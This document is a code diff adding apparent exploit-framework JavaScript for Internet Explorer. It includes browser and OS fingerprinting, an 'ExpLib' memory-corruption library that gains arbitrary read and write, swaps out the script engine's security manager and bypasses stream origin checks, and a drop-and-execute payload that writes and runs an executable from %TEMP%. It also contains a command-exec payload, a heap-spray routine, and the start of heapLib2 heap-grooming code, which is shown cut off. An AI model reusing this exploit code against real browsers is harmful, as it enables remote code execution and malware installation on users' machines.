+		version_build = ScriptEngineBuildVersion().toString();
+
+		version = version_maj + version_min + version_build;
+
+		//document.write("ScriptEngine: "+version+"<br />");
+		switch (version){
+			case "514615":
+				// IE 5.00.2920.0000, 2000 Advanced Server SP0 English
+				ua_version = "5.0";
+				os_name = "Windows 2000";
+				os_sp = "SP0";
+				break;
+			case "515907":
+				os_name = "Windows 2000";
+				os_sp = "SP3";	//or SP2: oCC.getComponentVersion('{22d6f312-b0f6-11d0-94ab-0080c74c7e95}', 'componentid') => 6,4,9,1109
+				break;
+			case "518513":
+				os_name = "Windows 2000";
+				os_sp = "SP4";
+				break;
+			case "566626":
+				// IE 6.0.2600.0000, XP SP0 English
+				// IE 6.0.2800.1106, XP SP1 English
+				ua_version = "6.0";
+				os_name = "Windows XP";
+				os_sp = "SP0";
+				break;
+			case "568515":
+				// IE 6.0.3790.0, 2003 Standard SP0 English
+				ua_version = "6.0";
+				os_name = "Windows 2003";
+				os_sp = "SP0";
+				break;
+			case "568820":
+				// IE 6.0.2900.2180, xp sp2 english
+				os_name = "Windows XP";
+				os_sp = "SP2";
+				break;
+			case "568827":
+				os_name = "Windows 2003";
+				os_sp = "SP1";
+				break;
+			case "568831":	//XP SP2 -OR- 2K SP4
+				if (os_name == "2000"){
+					os_sp = "SP4";
+				}
+				else{
+					os_name = "Windows XP";
+					os_sp = "SP2";
+				}
+				break;
+			case "568832":
+				os_name = "Windows 2003";
+				os_sp = "SP2";
+				break;
+			case "568837":
+				// IE 6.0.2900.2180, XP Professional SP2 Korean
+				ua_version = "6.0";
+				os_name = "Windows XP";
+				os_sp = "SP2";
+				break;
+			case "5716599":
+				// IE 7.0.5730.13, XP Professional SP3 English
+				// IE 6.0.2900.5512, XP Professional SP3 English
+				// IE 6.0.2900.5512, XP Professional SP3 Spanish
+				//
+				// Since this scriptengine applies to more than one major version of
+				// IE, rely on the object detection below to determine ua_version.
+				//ua_version = "6.0";
+				os_name = "Windows XP";
+				os_sp = "SP3";
+				break;
+			case "575730":
+				// IE 7.0.5730.13, Server 2003 Standard SP2 English
+				// IE 7.0.5730.13, Server 2003 Standard SP1 English
+				// IE 7.0.5730.13, XP Professional SP2 English
+				// Rely on the user agent matching above to determine the OS.
+				// This will incorrectly identify 2k3 SP1 as SP2
+				ua_version = "7.0";
+				os_sp = "SP2";
+				break;
+			case "5718066":
+				// IE 7.0.5730.13, XP Professional SP3 English
+				ua_version = "7.0";
+				os_name = "Windows XP";
+				os_sp = "SP3";
+				break;
+			case "5722589":
+				// IE 7.0.5730.13, XP Professional SP3 English
+				ua_version = "7.0";
+				os_name = "Windows XP";
+				os_sp = "SP3";
+				break;
+			case "576000":
+				// IE 7.0.6000.16386, Vista Ultimate SP0 English
+				ua_version = "7.0";
+				os_name = "Windows Vista";
+				os_sp = "SP0";
+				break;
+			case "580":
+				// IE 8.0.7100.0, Windows 7 English
+				// IE 8.0.7100.0, Windows 7 64-bit English
+			case "5816385":
+				// IE 8.0.7600.16385, Windows 7 English
+			case "5816475":
+			case "5816762":
+				// IE 8.0.7600.16385, Windows 7 English
+				ua_version = "8.0";
+				os_name = "Windows 7";
+				os_sp = "SP0";
+				break;
+			case "5817514":
+				// IE 8.0.7600.17514, Windows 7 SP1 English
+				ua_version = "8.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "5818702":
+				// IE 8.0.6001.18702, XP Professional SP3 English
+			case "5822960":
+				// IE 8.0.6001.18702, XP Professional SP3 Greek
+				ua_version = "8.0";
+				os_name = "Windows XP";
+				os_sp = "SP3";
+				break;
+			case "9016406":
+				// IE 9.0.7930.16406, Windows 7 64-bit
+				ua_version = "9.0";
+				os_name = "Windows 7";
+				os_sp = "SP0";
+				break;
+			case "9016441":
+				// IE 9.0.8112.16421, Windows 7 32-bit English
+				ua_version = "9.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "9016443":
+				// IE 9.0.8112.16421, Windows 7 Polish
+				// Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
+				ua_version = "9.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "9016446":
+				// IE 9.0.8112.16421, Windows 7 English (Update Versions: 9.0.7 (KB2699988)
+				// Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASA; InfoPath.3; MS-RTC LM 8; BRI/2)Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASA; InfoPath.3; MS-RTC LM 8; BRI/2)
+				ua_version = "9.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "9016464":
+				// browsershots.org, MSIE 7.0 / Windows 2008 R2
+				os_name = "Windows 2008 R2";
+				ua_version = "9.0";
+				break;
+			case "9016470":
+				// IE 9.0.8112.16421 / Windows 7 SP1
+				ua_version = "9.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "9016502":
+				// IE 9.0.8112.16502 / Windows 7 SP1
+				ua_version = "9.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "9016506":
+				// IE 9.0.8112.16506 / Windows 7 SP1
+				ua_version = "9.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "9016514":
+				// IE 9.0.8112.16514 / Windows 7 SP1
+				ua_version = "9.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "9016520":
+				// IE 9.0.8112.16520 / Windows 7 SP1
+				ua_version = "9.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "9016526":
+				// IE 9.0.8112.16526 / Windows 7 SP1
+				ua_version = "9.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "9016533":
+				// IE 9.0.8112.16533 / Windows 7 SP1
+				ua_version = "9.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "10016720":
+				// IE 10.0.9200.16721 / Windows 7 SP1
+				ua_version = "10.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "11016428":
+				// IE 11.0.9600.16428 / Windows 7 SP1
+				ua_version = "11.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "10016384":
+				// IE 10.0.9200.16384 / Windows 8 x86
+				ua_version = "10.0";
+				os_name = "Windows 8";
+				os_sp = "SP0";
+				break;
+			case "11016426":
+				// IE 11.0.9600.16476 / KB2898785 (Technically: 11.0.2) Windows 8.1 x86 English
+				ua_version = "11.0";
+				os_name = "Windows 8.1";
+				break;
+			case "1000":
+				// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
+				ua_version = "10.0";
+				os_name = "Windows 8";
+				os_sp = "SP0";
+				break;
+			case "1100":
+				// IE 11.0.10011.0 Windows 10.0 (Build 10074) English - insider preview
+				ua_version = "11.0";
+				os_name = "Windows 10";
+				os_sp = "SP0";
+				break;
+			default:
+				unknown_fingerprint = version;
+				break;
+		}
+
+		if (!ua_version) {
+			// The ScriptEngine functions failed us, try some object detection
+			if (document.documentElement && (typeof document.documentElement.style.maxHeight)!="undefined") {
+				// IE 11 detection, see: http://msdn.microsoft.com/en-us/library/ie/bg182625(v=vs.85).aspx
+				try {
+					if (document.__proto__ != undefined) { ua_version = "11.0"; }
+				} catch (e) {}
+
+				// IE 10 detection using nodeName
+				if (!ua_version) {
+					try {
+						var badNode = document.createElement && document.createElement("badname");
+						if (badNode && badNode.nodeName === "BADNAME") { ua_version = "10.0"; }
+					} catch(e) {}
+				}
+
+				// IE 9 detection based on a "Object doesn't support property or method" error
+				if (!ua_version) {
+					try {
+						document.BADNAME();
+					} catch(e) {
+						if (e.message.indexOf("BADNAME") > 0) {
+							ua_version = "9.0";
+						}
+					}
+				}
+
+				// IE8 detection straight from IEBlog.  Thank you Microsoft.
+				if (!ua_version) {
+					try {
+						ua_version = "8.0";
+						document.documentElement.style.display = "table-cell";
+					} catch(e) {
+						// This executes in IE7,
+						// but not IE8, regardless of mode
+						ua_version = "7.0";
+					}
+				}
+			} else if (document.compatMode) {
+				ua_version = "6.0";
+			} else if (window.createPopup) {
+				ua_version = "5.5";
+			} else if (window.attachEvent) {
+				ua_version = "5.0";
+			} else {
+				ua_version = "4.0";
+			}
+			switch (navigator.appMinorVersion){
+				case ";SP2;":
+					os_sp = "SP2";
+					break;
+			}
+		}
+	}
+
+	if (!os_name && navigator.platform == "Win32") { os_name = oses_windows; }
+
+	//--
+	// Figure out the type of Windows
+	//--
+	if (!ua_is_lying) {
+		version = useragent.toLowerCase();
+	} else if (navigator.oscpu) {
+		// Then this is Gecko and we can get at least os_name without the
+		// useragent
+		version = navigator.oscpu.toLowerCase();
+	} else {
+		// All we have left is the useragent and we know it's lying, so don't bother
+		version = " ";
+	}
+	if (!os_name || 0 == os_name.length) {
+		if (version.indexOf("windows") != -1)    { os_name = oses_windows; }
+		else if (version.indexOf("mac") != -1)   { os_name = oses_mac_osx; }
+		else if (version.indexOf("linux") != -1) { os_name = oses_linux;   }
+	}
+	if (os_name == oses_windows) {
+		if (version.indexOf("windows 95") != -1)          { os_name = "Windows 95";    }
+		else if (version.indexOf("windows nt 4") != -1)   { os_name = "Windows NT";    }
+		else if (version.indexOf("win 9x 4.9") != -1)     { os_name = "Windows ME";    }
+		else if (version.indexOf("windows 98") != -1)     { os_name = "Windows 98";    }
+		else if (version.indexOf("windows nt 5.0") != -1) { os_name = "Windows 2000";  }
+		else if (version.indexOf("windows nt 5.1") != -1) { os_name = "Windows XP";    }
+		else if (version.indexOf("windows nt 5.2") != -1) { os_name = "Windows 2003";  }
+		else if (version.indexOf("windows nt 6.0") != -1) { os_name = "Windows Vista"; }
+		else if (version.indexOf("windows nt 6.1") != -1) { os_name = "Windows 7";     }
+		else if (version.indexOf("windows nt 6.2") != -1) { os_name = "Windows 8";     }
+		else if (version.indexOf("windows nt 6.3") != -1) { os_name = "Windows 8.1";   }
+	}
+	if (os_name == oses_linux && (!os_vendor || 0 == os_vendor.length)) {
+		if (version.indexOf("gentoo") != -1)       { os_vendor = "Gentoo";  }
+		else if (version.indexOf("ubuntu") != -1)  { os_vendor = "Ubuntu";  }
+		else if (version.indexOf("debian") != -1)  { os_vendor = "Debian";  }
+		else if (version.indexOf("rhel") != -1)    { os_vendor = "RHEL";    }
+		else if (version.indexOf("red hat") != -1) { os_vendor = "RHEL";    }
+		else if (version.indexOf("centos") != -1)  { os_vendor = "CentOS";  }
+		else if (version.indexOf("fedora") != -1)  { os_vendor = "Fedora";  }
+		else if (version.indexOf("android") != -1) { os_vendor = "Android"; }
+	}
+
+	//--
+	// Language
+	//--
+	if (navigator.systemLanguage) {
+		// ie
+		os_lang = navigator.systemLanguage;
+	} else if (navigator.language) {
+		// gecko derivatives, safari, opera
+		os_lang = navigator.language;
+	} else {
+		// some other browser and we don't know how to get the language, so
+		// just guess english
+		os_lang = "en";
+	}
+
+	//--
+	// Architecture
+	//--
+	if (typeof(navigator.cpuClass) != 'undefined') {
+		// Then this is IE or Opera9+ and we can grab the arch directly
+		switch (navigator.cpuClass) {
+			case "x86":
+				arch = arch_x86;
+				break;
+			case "x64":
+				arch = arch_x86_64;
+				break;
+		}
+	}
+	if (!arch || 0 == arch.length) {
+		// We don't have the handy-dandy navagator.cpuClass, so infer from
+		// platform
+		version = navigator.platform;
+		//document.write(version + "\\n");
+		// IE 8 does a bit of wacky user-agent switching for "Compatibility View";
+		// 64-bit client on Windows 7, 64-bit:
+		//     Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0)
+		// 32-bit client on Windows 7, 64-bit:
+		//     Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)
+		// 32-bit client on Vista, 32-bit, "Compatibility View":
+		//     Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0)
+		//
+		// Report 32-bit client on 64-bit OS as being 32 because exploits will
+		// need to know the bittedness of the process, not the OS.
+		if ( ("Win32" == version) || (version.match(/i.86/)) ) {
+			arch = arch_x86;
+		} else if (-1 != version.indexOf('x64') || (-1 != version.indexOf('x86_64')))  {
+			arch = arch_x86_64;
+		} else if (-1 != version.indexOf('PPC'))  {
+			arch = arch_ppc;
+		}
+	}
+
+	this.ua_is_lying = ua_is_lying;
+	this.os_name = os_name;
+	this.os_vendor = os_vendor;
+	this.os_flavor = os_flavor;
+	this.os_device = os_device;
+	this.os_sp = os_sp;
+	this.os_lang = os_lang;
+	this.arch = arch;
+	this.ua_name = ua_name;
+	this.ua_version = ua_version;
+	this.ua_version = ua_version;
+
+	return { os_name:os_name, os_vendor:os_vendor, os_flavor:os_flavor, os_device:os_device, os_sp:os_sp, os_lang:os_lang, arch:arch, ua_name:ua_name, ua_version:ua_version };
+}; // function getVersion
+
+os_detect.searchVersion = function(needle, haystack) {
+	var index = haystack.indexOf(needle);
+	var found_version;
+	if (index == -1) { return; }
+	found_version = haystack.substring(index+needle.length+1);
+	if (found_version.indexOf(' ') != -1) {
+		// Strip off any junk at the end such as a CLR declaration
+		found_version = found_version.substring(0,found_version.indexOf(' '));
+	}
+	return found_version;
+};
+
+
+/*
+ * Return -1 if a < b, 0 if a == b, 1 if a > b
+ */
+ua_ver_cmp = function(ver_a, ver_b) {
+	// shortcut the easy case
+	if (ver_a == ver_b) {
+		return 0;
+	}
+
+	a = ver_a.split(".");
+	b = ver_b.split(".");
+	for (var i = 0; i < Math.max(a.length, b.length); i++) {
+		// 3.0 == 3
+		if (!b[i]) { b[i] = "0"; }
+		if (!a[i]) { a[i] = "0"; }
+
+		if (a[i] == b[i]) { continue; }
+
+		a_int = parseInt(a[i]);
+		b_int = parseInt(b[i]);
+		a_rest = a[i].substr(a_int.toString().length);
+		b_rest = b[i].substr(b_int.toString().length);
+		if (a_int < b_int) {
+			return -1;
+		} else if (a_int > b_int) {
+			return 1;
+		} else { // ==
+			// Then we need to deal with the stuff after the ints, e.g.:
+			// "b4pre"
+			if (a_rest == "b" && b_rest.length == 0) {
+				return -1;
+			}
+			if (b_rest == "b" && a_rest.length == 0) {
+				return 1;
+			}
+			// Just give up and try a lexicographical comparison
+			if (a_rest < b_rest) {
+				return -1;
+			} else if (a_rest > b_rest) {
+				return 1;
+			}
+		}
+	}
+	// If we get here, they must be equal
+	return 0;
+};
+
+ua_ver_lt = function(a, b) {
+	if (-1 == this.ua_ver_cmp(a,b)) { return true; }
+	return false;
+};
+ua_ver_gt = function(a, b) {
+	if (1 == this.ua_ver_cmp(a,b)) { return true; }
+	return false;
+};
+ua_ver_eq = function(a, b) {
+	if (0 == this.ua_ver_cmp(a,b)) { return true; }
+	return false;
+};
@@ -0,0 +1,426 @@
+
+
+ExpLib = (function() {
+
+	function ExpLib( num_arrays, arr_size, base, payload ) {
+		this.arr1 = null;
+		this.arr2 = null;
+		this.base = base;
+		this.arr_size = arr_size;
+		this.arr_arr = null;
+		// Allows to control the contents of the sprayed memory.
+		// Have into account some array positions will be corrupted
+		// while leaking and modifying things.
+		this.arr_contents = [];
+
+		this.payload = payload;
+		this.modules = {}
+		this.getproc = null;
+		this.loadlibrary = null;
+
+		// Offset to the Origin URL in the Stream, modifying it
+		// allows to bypass msado15.SecurityCheck(), allowing
+		// for example to write stream contents to filesystem.
+		this.stream_origin = 0x44;
+	}
+
+	ExpLib.prototype.resolveAPI = function( modulename, procname ) {
+		var module  = this.resolveModule( modulename );
+
+		return this.callAPI( this.getproc, module, this.allocateString(procname) );
+	}
+
+	ExpLib.prototype.resolveModule = function( modulename ) {
+		if ( this.modules[modulename] )
+			return this.modules[modulename];
+
+		var module = this.callAPI( this.loadlibrary, this.allocateString(modulename) );
+		this.modules[modulename] = module;
+		return module;
+	}
+
+	ExpLib.prototype.spray = function() {
+		this.arr_arr = new Array( num_arrays );
+
+		var decl = "[";
+
+		for ( var i = 0; i < this.arr_size - 1; ++ i ) {
+			decl += '0,';
+		}
+
+		decl += '0';
+		decl += ']';
+
+		for ( var i = 0; i < num_arrays; ++ i ) {
+			this.arr_arr[i] = eval(decl);
+			for(var j = 0; j < this.arr_contents.length; j++) {
+				this.arr_arr[i][j] = this.arr_contents[j];
+			}
+		}
+
+  }
+
+	// Should be used before calling spray()
+	ExpLib.prototype.setArrContents = function(contents) {
+		for(var i = 0; i < this.arr_size && i < contents.length; i++) {
+			this.arr_contents[i] = contents[i];
+		}
+	}
+
+  ExpLib.prototype.setValue = function(i1, i2, v) {
+		this.arr_arr[i1][i2] = v;
+	}
+
+
+  ExpLib.prototype.setValueByAddr = function(index, addr, v) {
+		this.arr_arr[index][((addr % 0x1000) - 0x20) / 4] = v;
+	}
+
+	ExpLib.prototype.read32 = function(addr) {
+		if ( addr % 4 ) {
+			// error
+		}
+
+		if ( addr >= this.arr2_member_base ) {
+			return this.arr2[(addr - this.arr2_member_base)/4];
+		} else {
+			return this.arr2[0x40000000 - (this.arr2_member_base - addr)/4]
+		}
+	}
+
+	ExpLib.prototype.write32 = function(addr, value) {
+		if ( addr % 4 ) {
+			// error
+		}
+
+		if ( value >= 0x80000000 )
+			value = -(0x100000000 - value);
+
+		//alert(((addr - this.arr2_member_base)/4).toString(16));
+		if ( addr >= this.arr2_member_base ) {
+			this.arr2[(addr - this.arr2_member_base)/4] = value;
+		} else {
+			this.arr2[0x40000000 - (this.arr2_member_base - addr) / 4] = value;
+		}
+	}
+
+	ExpLib.prototype.read8 = function(addr) {
+		var value = this.read32( addr  & 0xfffffffc );
+		switch ( addr % 4 ) {
+			case 0: return (value & 0xff);
+			case 1: return ((value >> 8) & 0xff);
+			case 2: return ((value >> 16) & 0xff);
+			case 3: return ((value >> 24) & 0xff);
+		}
+
+		return 0;
+	}
+
+	ExpLib.prototype.write8 = function(addr, value) {
+		var original_value = this.read32( addr  & 0xfffffffc );
+		var new_value;
+
+		switch ( addr % 4 ) {
+			case 0:
+				new_value = (original_value & 0xffffff00) | (value & 0xff);
+				break;
+
+			case 1:
+				new_value = (original_value & 0xffff00ff) | ((value & 0xff) << 8);
+				break;
+			case 2:
+				new_value = (original_value & 0xff00ffff) | ((value & 0xff) << 16);
+				break;
+			case 3:
+				new_value = (original_value & 0x00ffffff) | ((value & 0xff) << 24);
+				break;
+		}
+
+
+		this.write32( addr  & 0xfffffffc, new_value );
+	}
+
+
+	ExpLib.prototype.writeBytes = function(addr, bytes) {
+		for ( var i = 0; i + 3 < bytes.length; i += 4 ) {
+			var value = (bytes[i] & 0xff) | ((bytes[i+1] & 0xff) << 8) |
+						((bytes[i + 2] & 0xff) << 16) | ((bytes[i + 3] & 0xff) << 24);
+
+			this.write32( addr + i, value );
+		}
+
+		for ( ; i < bytes.length; ++ i ) {
+			this.write8( addr + i, bytes[i] );
+		}
+	}
+
+	ExpLib.prototype.writeString = function(addr, s) {
+		var bytes = [];
+		var i = 0;
+		for ( ; i < s.length; ++ i ) {
+			bytes[i] = s.charCodeAt(i);
+		}
+
+		bytes[i] = 0;
+
+		this.writeBytes( addr, bytes );
+	}
+
+	ExpLib.prototype.writeStringW = function(addr, s) {
+		var bytes = [];
+		var i = 0;
+		for ( ; i < s.length; ++i ) {
+			bytes[i * 2] = s.charCodeAt(i);
+			bytes[i * 2 + 1] = 0;
+		}
+
+		bytes[s.length * 2] = 0;
+		bytes[s.length * 2 + 1] = 0;
+
+		this.writeBytes( addr, bytes );
+	}
+
+	ExpLib.prototype.read16 = function(addr) {
+		if ( addr % 2 ) {
+					// error, not aligned
+		}
+
+		var value = this.read32( addr  & 0xfffffffc );
+		switch ( addr % 4 ) {
+			case 0: return (value & 0xffff);
+			case 1: return ((value >> 8) & 0xffff);
+			case 2: return ((value >> 16) & 0xffff);
+			case 3: /*not supported*/ break;
+		}
+
+		return 0;
+	}
+
+	ExpLib.prototype.strequal = function(addr, s)  {
+		for ( var i = 0; i < s.length; ++ i ) {
+			if ( this.read8(addr + i) != s.charCodeAt(i) )
+				return false;
+		}
+
+		return true;
+	}
+
+
+	ExpLib.prototype.getModuleBase = function(addr) {
+
+		var cur_addr = addr;
+
+		while ( cur_addr > 0 ) {
+
+			if ( (this.read32(cur_addr) & 0xffff) == 0x5a4d ) {
+				return cur_addr;
+			}
+
+			cur_addr -= 0x10000;
+		}
+
+		return 0;
+	}
+
+
+
+	ExpLib.prototype.getModuleBaseFromIAT = function(base, name) {
+		var import_table = base + this.read32( base + this.read32(base + 0x3c) + 0x80 );
+		var cur_table = import_table;
+
+		while ( cur_table < import_table + 0x1000 ) {
+
+			var name_addr = base + this.read32(cur_table + 12);
+			if ( this.strequal( name_addr, name ) ) {
+				var iat = base + this.read32(cur_table + 16);
+				var func = this.read32(iat);
+				while ( 0 == func ) {
+					iat += 4;
+					func = this.read32(iat);
+				}
+
+				return this.getModuleBase( func & 0xFFFF0000 );
+
+			}
+
+			cur_table += 20;
+		}
+
+		return 0;
+	}
+
+	ExpLib.prototype.getProcAddress = function(base, procname)  {
+		var export_table = base + this.read32( base + this.read32(base + 0x3c) + 0x78 );
+		var num_functions = this.read32( export_table + 20 );
+		var addr_functions = base + this.read32( export_table + 28 );
+		var addr_names = base + this.read32( export_table + 32 );
+		var addr_ordinals = base + this.read32( export_table + 36 );
+
+		for ( var i = 0; i < num_functions; ++ i ) {
+			var name_addr = this.read32( addr_names + i * 4 ) + base;
+			if ( this.strequal( name_addr, procname ) ) {
+				var ordinal = this.read16( addr_ordinals + i * 2 );
+				var result = this.read32( addr_functions + ordinal * 4 ) + base;
+				return result;
+			}
+		}
+
+		return 0;
+	}
+
+	ExpLib.prototype.searchBytes = function(pattern, start, end)  {
+
+		if ( start >= end || start + pattern.length > end )
+			return 0;
+
+		var pos = start;
+		while ( pos < end ) {
+			for ( var i = 0; i < pattern.length; ++ i ) {
+				if ( this.read8(pos + i) != pattern[i] )
+					break;
+			}
+
+			if ( i == pattern.length ) {
+				return pos;
+			}
+
+			++ pos;
+		}
+
+		return 0;
+	}
+
+
+	ExpLib.prototype.getError = function(msg) {
+		return this.err_msg;
+	}
+
+	ExpLib.prototype.setError = function(msg) {
+		this.err_msg = msg;
+	}
+
+	ExpLib.prototype.setStreamOrigin = function(offset) {
+		this.stream_origin = offset;
+	}
+
+	ExpLib.prototype.getStreamOrigin = function() {
+		return this.stream_origin;
+	}
+
+	ExpLib.prototype.memcpy = function(dst, src, size) {
+		var i = 0;
+		for ( ; i < size - 4; i += 4 ) {
+			this.write32( dst + i, this.read32(src + i) );
+		}
+
+		for ( ; i < size; ++ i ) {
+			this.write8( dst + i, this.read8(src + i) );
+		}
+	}
+
+	ExpLib.prototype.go = function() {
+
+		var i = 0;
+
+
+
+		for ( ; i < this.arr_arr.length - 1; ++ i ) {
+			this.arr_arr[i][this.arr_size + 0x1c / 4] = 0;
+
+			if ( this.arr_arr[i][this.arr_size + 0x18 / 4] == this.arr_size ) {
+				this.arr_arr[i][this.arr_size + 0x14 / 4] = 0x3fffffff;
+				this.arr_arr[i][this.arr_size + 0x18 / 4] = 0x3fffffff;
+
+				this.arr_arr[i + 1].length = 0x3fffffff;
+
+				if ( this.arr_arr[i+1].length == 0x3fffffff ) {
+					break;
+				}
+			}
+
+		}
+
+		if ( i >= this.arr_arr.length - 1 ) {
+			this.setError( "Cannot find array with corrupt length!" );
+			return false;
+		}
+
+		this.arr1_idx = i;
+		this.arr2_idx = i + 1;
+
+		this.arr1 = this.arr_arr[i];
+		this.arr2 = this.arr_arr[i + 1];
+
+		this.arr2_base = this.base + 0x1000;
+		this.arr2_member_base = this.arr2_base + 0x20;
+
+		var func_addr = this.leakAddress(ActiveXObject);
+		var script_engine_addr = this.read32(this.read32(func_addr + 0x1c) + 4);
+
+		//alert(script_engine_addr.toString(16));
+
+		var original_securitymanager = this.read32( script_engine_addr + 0x21c );
+		if ( !original_securitymanager ) {
+			// let security manager to be valid
+			try {
+				var WshShell = new ActiveXObject("WScript.shell");
+			} catch (e) {}
+
+			original_securitymanager = this.read32( script_engine_addr + 0x21c );
+		}
+
+		var original_securitymanager_vtable = this.read32(original_securitymanager);
+		var securitymanager_size = 0x28;
+		var fake_securitymanager = 0x1a1b2010;
+		var fake_securitymanager_vtable = fake_securitymanager + 0x28;
+		//alert(original_securitymanager.toString(16));
+
+		this.memcpy( fake_securitymanager, original_securitymanager, securitymanager_size );
+		this.memcpy( fake_securitymanager_vtable, original_securitymanager_vtable, 0x70 );
+		this.write32( fake_securitymanager, fake_securitymanager_vtable );
+		this.write32(script_engine_addr + 0x21c, fake_securitymanager);
+
+		var jscript9_base = this.getModuleBase( this.read32(script_engine_addr) & 0xffff0000 );
+		var jscript9_code_start = jscript9_base + this.read32(jscript9_base + this.read32(jscript9_base + 0x3c) + 0x104);
+		var jscript9_code_end = jscript9_base + this.read32(jscript9_base + this.read32(jscript9_base + 0x3c) + 0x108);
+
+
+		this.write32( fake_securitymanager_vtable + 0x14,
+					 this.searchBytes( [0x8b, 0xe5, 0x5d, 0xc2, 0x08], jscript9_code_start, jscript9_code_end ) ); /* mov esp, ebp; pop ebp; ret 8; */
+
+		this.write32( fake_securitymanager_vtable + 0x10,
+					 this.searchBytes( [0x8b, 0xe5, 0x5d, 0xc2, 0x04], jscript9_code_start, jscript9_code_end ) ); /* mov esp, ebp; pop ebp; ret 4; */
+
+		this.payload.execute(this);
+
+
+		/*
+		* restore
+		*/
+
+		this.write32( script_engine_addr + 0x21c, original_securitymanager );
+
+		return true;
+
+	}
+
+	ExpLib.prototype.leakAddress = function(obj) {
+		this.arr_arr[this.arr2_idx + 1][2] = obj;
+		return this.read32(this.arr2_member_base + 0x1008);
+	}
+
+	ExpLib.prototype.switchStreamOrigin = function(stream) {
+		var obj = this.leakAddress(stream);
+		var stream_obj = this.read32(obj + 0x30);
+		//var url_addr = this.read32(stream_obj + 0x3c);
+		var url_addr = this.read32(stream_obj + this.stream_origin);
+
+		/*
+		* bypass domain check
+		*/
+		this.writeStringW( url_addr, 'file:///C:/1.htm' );
+	}
+
+	return ExpLib;
+
+})();
@@ -0,0 +1,33 @@
+function payload_drop_exec(pe) {
+
+	this.execute = function(explib) {
+
+		var WshShell = new ActiveXObject("WScript.shell");
+		var temp = WshShell.ExpandEnvironmentStrings("%TEMP%");
+		var filename = temp + "\\a.exe";
+
+		var bStream = new ActiveXObject("ADODB.Stream");
+		var txtStream = new ActiveXObject("ADODB.Stream");
+		bStream.Type = 1;
+		txtStream.Type = 2;
+
+		bStream.Open();
+		txtStream.Open();
+
+		explib.switchStreamOrigin(txtStream);
+
+		txtStream.WriteText(pe);
+		txtStream.Position = 2;
+		txtStream.CopyTo( bStream );
+		txtStream.Close();
+
+		explib.switchStreamOrigin(bStream);
+
+		bStream.SaveToFile(filename, 2);
+		bStream.Close();
+
+		oExec = WshShell.Exec(filename);
+	}
+
+	return this;
+}
@@ -0,0 +1,10 @@
+function payload_exec(cmd) {
+
+	this.execute = function(explib) {
+
+		var WshShell = new ActiveXObject("WScript.shell");
+		var oExec = WshShell.Exec(cmd);
+	}
+
+	return this;
+}
@@ -0,0 +1,17 @@
+var memory = new Array();
+function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
+  var index;
+  var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
+  var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
+  while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
+  while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
+
+  var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
+  while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
+  retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
+
+  var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
+  for (index = 0; index < heapBlockCnt; index++) {
+    memory[index] = retSlide + shellcode;
+  }
+}
@@ -0,0 +1,192 @@
+//heapLib2 namespace
+function heapLib2() { } 
+
+//These are attributes that will not actually create a bstr 
+//and directly use the back-end allocator, completely bypassing the cache
+var global_attrs = ["title", "lang", "class"];
+
+heapLib2.ie = function(element, maxAlloc)
+{
+    //128mb
+    this.maxAlloc = 0x8000000;
+
+    //make sure that an HTML DOM element is passed
+    if(!element.nodeType || element.nodeType != 1)
+        throw "alloc.argument: element not valid"; 
+
+    this.element = element; 
+
+    if(maxAlloc)
+        this.maxAlloc = maxAlloc; 
+
+    //empty the cache
+    this.Oleaut32EmptyCache();
+    this.Oleaut32FillCache();
+    this.Oleaut32EmptyCache();
+
+}
+
+heapLib2.ie.prototype.newelement = function(element)
+{
+    //make sure that an HTML DOM element is passed
+    if(!element.nodeType || element.nodeType != 1)
+        throw "alloc.argument: element not valid"; 
+
+    this.element = element; 
+}
+
+heapLib2.ie.prototype.alloc = function(attr_name, size, cache_ok) 
+{
+    if(typeof(cache_ok)==='undefined')
+        cache_ok = false;
+    else
+        cache_ok = true;
+
+    //make sure the attribute name is a string
+    if(typeof attr_name != "string")
+        throw "alloc.argument: attr_name is not a string"; 
+
+    //make sure that the attribute name is not already present in the html element
+    if(this.element.getAttribute(attr_name))
+        throw "alloc.argument: element already contains attr_name: " + attr_name;
+
+    //ensure the size is a number
+    if(typeof size != "number")
